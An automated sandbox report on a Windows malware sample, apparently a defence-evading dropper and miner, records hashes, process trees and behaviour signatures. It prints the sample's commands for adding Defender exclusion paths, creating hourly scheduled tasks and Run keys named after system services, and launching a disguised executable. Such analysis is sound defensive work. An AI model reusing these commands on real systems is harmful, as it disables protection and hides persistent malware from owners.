Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
07-10-2022 15:27
Static task
static1
Behavioral task
behavioral1
Sample
f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe
Resource
win10-20220812-en
General
-
Target
f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe
-
Size
732KB
-
MD5
167eba19fe5ab32bbce67fe42d28810a
-
SHA1
309c9a18a6981bb9161a50bda2847f2aebd78463
-
SHA256
f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868
-
SHA512
6ae42a4109201214bba786ae61d2a6e4e3c4d441f4879fa6b7d807dc548bccbb981a9923d50df324e610544d052531af6da9fc35701decdef67fd86f72a0a13a
-
SSDEEP
768:rZmchlXKGREW6VA6joSRhFH+C9Pe2auEqainmngYWxuv8Gwmwoe9R4ZstojtfcWv:schl6M+lpDCUoHid0bIrlyR
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 3576 dllhost.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Windows\\System32\\SecurityHealthSystray.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\NvStray = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe\\Cortana.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 160 schtasks.exe 1428 schtasks.exe 824 schtasks.exe 1548 schtasks.exe 2120 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4224 powershell.exe 4224 powershell.exe 4224 powershell.exe 1528 powershell.exe 1528 powershell.exe 1528 powershell.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe 3576 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 3576 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2196 wrote to memory of 4892 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe 66 PID 2196 wrote to memory of 4892 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe 66 PID 2196 wrote to memory of 4892 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe 66 PID 4892 wrote to memory of 3552 4892 cmd.exe 68 PID 4892 wrote to memory of 3552 4892 cmd.exe 68 PID 4892 wrote to memory of 3552 4892 cmd.exe 68 PID 4892 wrote to memory of 4224 4892 cmd.exe 69 PID 4892 wrote to memory of 4224 4892 cmd.exe 69 PID 4892 wrote to memory of 4224 4892 cmd.exe 69 PID 4892 wrote to memory of 1528 4892 cmd.exe 70 PID 4892 wrote to memory of 1528 4892 cmd.exe 70 PID 4892 wrote to memory of 1528 4892 cmd.exe 70 PID 2196 wrote to memory of 3576 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe 71 PID 2196 wrote to memory of 3576 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe 71 PID 2196 wrote to memory of 3576 2196 f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe 71 PID 3576 wrote to memory of 3216 3576 dllhost.exe 72 PID 3576 wrote to memory of 3216 3576 dllhost.exe 72 PID 3576 wrote to memory of 3216 3576 dllhost.exe 72 PID 3576 wrote to memory of 2744 3576 dllhost.exe 76 PID 3576 wrote to memory of 2744 3576 dllhost.exe 76 PID 3576 wrote to memory of 2744 3576 dllhost.exe 76 PID 3576 wrote to memory of 2840 3576 dllhost.exe 73 PID 3576 wrote to memory of 2840 3576 dllhost.exe 73 PID 3576 wrote to memory of 2840 3576 dllhost.exe 73 PID 3576 wrote to memory of 5096 3576 dllhost.exe 74 PID 3576 wrote to memory of 5096 3576 dllhost.exe 74 PID 3576 wrote to memory of 5096 3576 dllhost.exe 74 PID 3576 wrote to memory of 4464 3576 dllhost.exe 75 PID 3576 wrote to memory of 4464 3576 dllhost.exe 75 PID 3576 wrote to memory of 4464 3576 dllhost.exe 75 PID 3576 wrote to memory of 2812 3576 dllhost.exe 77 PID 3576 wrote to memory of 2812 3576 dllhost.exe 77 PID 3576 wrote to memory of 2812 3576 dllhost.exe 77 PID 3576 wrote to memory of 4748 3576 dllhost.exe 78 PID 3576 wrote to memory of 4748 3576 dllhost.exe 78 PID 3576 wrote to memory of 4748 3576 dllhost.exe 78 PID 3576 wrote to memory of 3260 3576 dllhost.exe 80 PID 3576 wrote to memory of 3260 3576 dllhost.exe 80 PID 3576 wrote to memory of 3260 3576 dllhost.exe 80 PID 3576 wrote to memory of 4968 3576 dllhost.exe 81 PID 3576 wrote to memory of 4968 3576 dllhost.exe 81 PID 3576 wrote to memory of 4968 3576 dllhost.exe 81 PID 3576 wrote to memory of 2684 3576 dllhost.exe 83 PID 3576 wrote to memory of 2684 3576 dllhost.exe 83 PID 3576 wrote to memory of 2684 3576 dllhost.exe 83 PID 3576 wrote to memory of 4448 3576 dllhost.exe 86 PID 3576 wrote to memory of 4448 3576 dllhost.exe 86 PID 3576 wrote to memory of 4448 3576 dllhost.exe 86 PID 3576 wrote to memory of 4736 3576 dllhost.exe 95 PID 3576 wrote to memory of 4736 3576 dllhost.exe 95 PID 3576 wrote to memory of 4736 3576 dllhost.exe 95 PID 3216 wrote to memory of 160 3216 cmd.exe 96 PID 3216 wrote to memory of 160 3216 cmd.exe 96 PID 3216 wrote to memory of 160 3216 cmd.exe 96 PID 2840 wrote to memory of 824 2840 cmd.exe 98 PID 2840 wrote to memory of 824 2840 cmd.exe 98 PID 2840 wrote to memory of 824 2840 cmd.exe 98 PID 4748 wrote to memory of 1428 4748 cmd.exe 97 PID 4748 wrote to memory of 1428 4748 cmd.exe 97 PID 4748 wrote to memory of 1428 4748 cmd.exe 97 PID 2812 wrote to memory of 1548 2812 cmd.exe 99 PID 2812 wrote to memory of 1548 2812 cmd.exe 99 PID 2812 wrote to memory of 1548 2812 cmd.exe 99 PID 4968 wrote to memory of 2120 4968 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe"C:\Users\Admin\AppData\Local\Temp\f57e172f7296a9d4033a35879593347f795b05317f222a1b6903593dd1b8c868.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\HostData"2⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:3552
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:160
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:824
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:5096
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:4464
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:2744
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:3260
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1302" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1302" /TR "C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Creates scheduled task(s)
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk2938" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:2684
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2854" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:4448
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk8497" /TR "C:\ProgramData\Dllhost\dllhost.exe"3⤵PID:4736
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off3⤵PID:3528
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵PID:304
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off3⤵PID:2172
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵PID:1416
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
956KB
MD5f32f7f4417efb436a8c0470f8a1e7cfd
SHA1cd3e0d12afbda2a6fa0c659ca2749d7ce9104bee
SHA25607457fcd413e0df165eb5d0c5105f3e2876aa7224a882fe823e060ef6194e2d8
SHA5124a72b5560f0c35e375e8bd8996a5d95df15fdde60b29653e0e84af8b70d40e8bb3cd7b690511446a3fbe740cf8e61d3a51076706a136fc200e8cb4c347fcf259
-
Filesize
956KB
MD5f32f7f4417efb436a8c0470f8a1e7cfd
SHA1cd3e0d12afbda2a6fa0c659ca2749d7ce9104bee
SHA25607457fcd413e0df165eb5d0c5105f3e2876aa7224a882fe823e060ef6194e2d8
SHA5124a72b5560f0c35e375e8bd8996a5d95df15fdde60b29653e0e84af8b70d40e8bb3cd7b690511446a3fbe740cf8e61d3a51076706a136fc200e8cb4c347fcf259
-
Filesize
497B
MD513fda2ab01b83a5130842a5bab3892d3
SHA16e18e4b467cde054a63a95d4dfc030f156ecd215
SHA25676973d42c8fceceab7ec85b3d01b218db92564993e93a9bea31c52aa73aeee9e
SHA512c51f9fd6e452fbeeedd4dfaba3c7c887e337f01e68abdd27d4032f8be85def7ef3cf0c77bf60e425b085b76c0539464c6b6e5e805a69397c5519e8ccf9fffccc
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
18KB
MD500ec4284520ef47b949eb03b30c48ae1
SHA17f58f5b5f6bfbbc25f33e91c4734d6201a86b4f7
SHA256e386109ed00ebbe9c7b19826c059de64f73f9aed6590c731c10253e36fcb3f9a
SHA512cafff70306c3dd514691fd8747394c9999d5f67aec17a06a67fc409389356ac269f20f1cfdceebc990a68e4f451906e26bc688c4fc96d0bfef0eee28920f9a11